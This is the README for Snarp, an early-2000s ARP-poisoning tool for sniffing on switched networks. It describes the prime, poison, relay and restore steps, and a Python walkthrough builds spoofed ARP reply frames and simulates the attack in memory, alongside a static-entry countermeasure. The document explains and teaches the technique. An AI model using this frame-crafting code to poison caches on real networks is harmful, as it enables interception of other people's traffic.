Program:      Snarp
Version:      0.9f
Author:       Frank Knobbe (Frank@Knobbe.net)
Date:         2-2-2001
Status:       Public Pre-Release
Distribution: free
Platform:     Currently only NT4.0
Dependencies: PCap driver, LibNetNT
Usage:        Run Snarp with -h or -? for parameters


WHY
---

Howdy,

First off, let me say that I'm not a professional programmer. I started to program in C (Borland Turbo C) back in '87. For a while I was programming quite a bit under TOS (that's the OS of the Atari ST, GEM being the GUI), mainly a BBS system for the Atari called ST-Sysop that tied into the German BBS network called PCNet. Since my move to the US I have worked more in engineering and consulting, and have been using C only on occasion to hack together some tools. One of those was the POP2SMTP gateway, which was my first IP program. Naturally it was done using Windows sockets.

With the PCap drivers for Windows available from http://netgroup-serv.polito.it/winpcap/ and the first port of LibNet by Ryan Permeh with eEye (http://www.eeye.com/html/tools/libnetnt.html), the power of packet sniffing and packet crafting finally came to the Windows world.

In the winter of 2000, I created a couple of Ethernet cables that allow receiving packets but prevent sending them: the ideal sniffer cable. However, one of the two cables (which behaves like a Shomiti tap) works great on hubs, but it confuses switches. So I set out to write a program that allows sniffing of traffic on a switched network. My first step beyond sockets...


HOW
---

The program is called Snarp because it uses an ARP poisoning attack to make a host redirect its traffic to the attacking machine (the machine running Snarp), so that the attacking machine can sniff the data off the wire.

Snarp is run with the IP addresses or host names of the two hosts to be attacked (call them A and B) as parameters. First it sends a spoofed ICMP packet to target B with the source address of target A, and vice versa.
This causes the two hosts to make a note of each other's MAC address in their local ARP tables (creating an entry if there was not already one), because each host has to resolve the other's address to answer the echo. Snarp then sends a spoofed ARP reply packet to each host, which updates that entry with the MAC address of the attacking machine. Most operating systems these days do not check whether an ARP reply is actually a response to a query the host sent out. Call it a bug or laziness on the part of the programmers, but it hurts the security of systems.

Anyway, having sent the spoofed ARP replies (and successfully poisoned both ARP caches), host A now sends all packets destined for host B to the attacking machine, and host B does the same with its packets for host A. Snarp sniffs this traffic and then forwards it on to the real destination, so communication between A and B is not interrupted. Since the attacking machine receives all packets, a sniffer program like tcpdump, ngrep, or Sniffer Pro can be run on it to examine all data. (Note that every packet will appear twice, once when received and again when relayed to the original destination.)

The traffic relay occurs in a loop. Snarp keeps the ARP tables on both hosts poisoned by continuing to send spoofed ARP reply packets at a certain interval, since the poisoned entries would otherwise age out. Once you are finished observing traffic, simply hit the Escape key. Snarp now sends one more spoofed ARP reply packet to each host (this time carrying the correct MAC addresses), and thereby restores the original traffic flow. It still relays any lingering packets for a few seconds and then exits.

Snarp is written only for IP networks. Although it may be possible to attack other protocols (e.g. IPX) in a similar way, since the whole scheme is based on MAC addresses at the link layer, only IP is supported because Snarp relies on ARP and on the flaws in the operating systems' handling of it.
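The sequence just described (prime both ARP caches, poison them with unsolicited replies, relay the redirected frames, restore the real addresses on exit), walked through in Python as an added example. This is not Snarp's own code, which uses LibNetNT and WinPcap on NT; everything here is constructed in memory and nothing is put on a wire. The MAC and IP addresses are made up, the ArpCache class models the permissive cache behaviour the text describes (it also pins static entries, the defense discussed in the next section), and the ARP/Ethernet frames are packed by hand so you can see exactly which bytes do the work.

```python
import struct

ETH_P_IP, ETH_P_ARP = 0x0800, 0x0806
ARP_REPLY = 2


def mac(s):
    return bytes.fromhex(s.replace(":", ""))


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def ip(s):
    return bytes(int(x) for x in s.split("."))


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II frame carrying an ARP reply 'sender_ip is-at sender_mac',
    unicast to target_mac. No request preceded it; that is the whole trick."""
    eth = target_mac + sender_mac + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, ETH_P_IP, 6, 4, ARP_REPLY)
    return eth + arp + sender_mac + sender_ip + target_mac + target_ip


def parse_arp(frame):
    """Return (op, sender_mac, sender_ip, target_mac, target_ip) or None."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    op = struct.unpack("!H", frame[20:22])[0]
    return op, frame[22:28], frame[28:32], frame[32:38], frame[38:42]


class ArpCache:
    """The permissive behaviour the README relies on: a reply for an IP that is
    already in the table overwrites the entry whether or not a request was ever
    sent. Entries marked static are never overwritten (assumed model)."""

    def __init__(self):
        self.table = {}  # ip bytes -> [mac bytes, is_static]

    def learn(self, ip_addr, mac_addr, static=False):
        self.table[ip_addr] = [mac_addr, static]

    def receive(self, frame):
        """Process one frame; return True if the table changed."""
        arp = parse_arp(frame)
        if arp is None or arp[0] != ARP_REPLY:
            return False
        entry = self.table.get(arp[2])
        # Only an existing entry gets refreshed, which is why Snarp first
        # provokes ICMP traffic between the two hosts.
        if entry is None or entry[1]:
            return False
        entry[0] = arp[1]
        return True

    def lookup(self, ip_addr):
        return self.table[ip_addr][0]


def ipv4_frame(dst_mac, src_mac, src_ip, dst_ip, payload):
    """Minimal IPv4/ICMP frame (constructed sample; header checksum left zero)."""
    hdr = b"\x45\x00" + struct.pack("!H", 20 + len(payload)) + b"\x00\x00\x40\x00\x40\x01\x00\x00"
    return dst_mac + src_mac + struct.pack("!H", ETH_P_IP) + hdr + src_ip + dst_ip + payload


def relay(frame, attacker_mac, real_mac_of):
    """The attacker's forwarding step: an IP frame that arrived at the attacker's
    MAC but is addressed (at the IP layer) to a victim is re-sent to the victim's
    real MAC. The IP packet itself is untouched, so a sniffer on the attacking
    machine sees it twice, once inbound and once outbound."""
    if frame[:6] != attacker_mac or frame[12:14] != struct.pack("!H", ETH_P_IP):
        return None
    dst_ip = frame[30:34]  # 14-byte Ethernet header + IPv4 destination at offset 16
    if dst_ip not in real_mac_of:
        return None
    return real_mac_of[dst_ip] + attacker_mac + frame[12:]


def run_attack():
    """Walk through prime -> poison -> relay -> restore; report what each host believes."""
    a_mac, b_mac, x_mac = mac("00:11:22:00:00:0a"), mac("00:11:22:00:00:0b"), mac("00:11:22:00:00:ee")
    a_ip, b_ip = ip("10.0.0.1"), ip("10.0.0.2")
    host_a, host_b = ArpCache(), ArpCache()
    # 1. After the spoofed ICMP exchange both hosts hold each other's real MAC.
    host_a.learn(b_ip, b_mac)
    host_b.learn(a_ip, a_mac)
    # 2. Poison: tell A that B's IP lives at the attacker's MAC, and vice versa.
    host_a.receive(build_arp_reply(x_mac, b_ip, a_mac, a_ip))
    host_b.receive(build_arp_reply(x_mac, a_ip, b_mac, b_ip))
    poisoned = (mac_str(host_a.lookup(b_ip)), mac_str(host_b.lookup(a_ip)))
    # 3. A sends to "B" via its poisoned entry; the frame lands on the attacker, who relays it.
    from_a = ipv4_frame(host_a.lookup(b_ip), a_mac, a_ip, b_ip, b"hello B")
    forwarded = relay(from_a, x_mac, {a_ip: a_mac, b_ip: b_mac})
    # 4. Restore on exit: the same mechanism, this time carrying the real MACs.
    host_a.receive(build_arp_reply(b_mac, b_ip, a_mac, a_ip))
    host_b.receive(build_arp_reply(a_mac, a_ip, b_mac, b_ip))
    restored = (mac_str(host_a.lookup(b_ip)), mac_str(host_b.lookup(a_ip)))
    # Countermeasure: a host with a static entry for B ignores the spoofed reply.
    host_s = ArpCache()
    host_s.learn(b_ip, b_mac, static=True)
    static_changed = host_s.receive(build_arp_reply(x_mac, b_ip, a_mac, a_ip))
    return {
        "poisoned": poisoned,
        "forwarded_dst_mac": mac_str(forwarded[:6]),
        "forwarded_payload": forwarded[-7:],
        "restored": restored,
        "static_overwritten": static_changed,
    }


if __name__ == "__main__":
    for key, value in run_attack().items():
        print(key, value)
```

Note that the restore step is the attack run once more with honest addresses: the same build_arp_reply call that poisons a cache also repairs it, which is why Snarp can undo itself on Escape. The relay keeps the IP packet byte-for-byte, which is the reason the README warns that a sniffer on the attacking machine sees every packet twice.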
To prevent this attack from working, one can enter static entries in a host's ARP table, which should not be overwritten by bogus ARP reply packets. (Check this on the stack in question; not every implementation actually honors static entries.) A future version of Snarp will also include an ICMP redirect attack to still provide the functionality of rerouting traffic even if static ARP entries are used (or so is the plan...).

*** Please use Snarp responsibly. I have written it as a proof of concept, but sometimes use it in troubleshooting. I urge you to use it only on networks where you are authorized to do so, and against data you are authorized to observe. Please do not misuse it for unethical or criminal purposes. Observing someone's data without their permission and knowledge violates the privacy of that person's data, is unethical, and may be illegal (possibly leading to prosecution). ***

The program appears to be running great under Windows NT 4.0. However, I was not successful with it under Windows 2000. Maybe there are still some bugs in LibNetNT; I will investigate this further when I have spare time. If anyone is able to get it to run under W2K, please let me know. It is not supported under Windows 9x/ME since it relies on the LibNetNT DLL.

Also attached are the WinPcap drivers for NT 4.0 and W2K and the LibNetNT DLL. This is the version of LibNetNT that came with Snort 1.6 (another excellent port from the Unix world to the Windows world). If you already have a LibNetNT DLL installed and you experience problems, use the attached one (recommended). The source code is attached as well. Be gentle with me; I mentioned in the beginning that I'm not a pro...

Regards,
Frank Knobbe (Frank@Knobbe.net)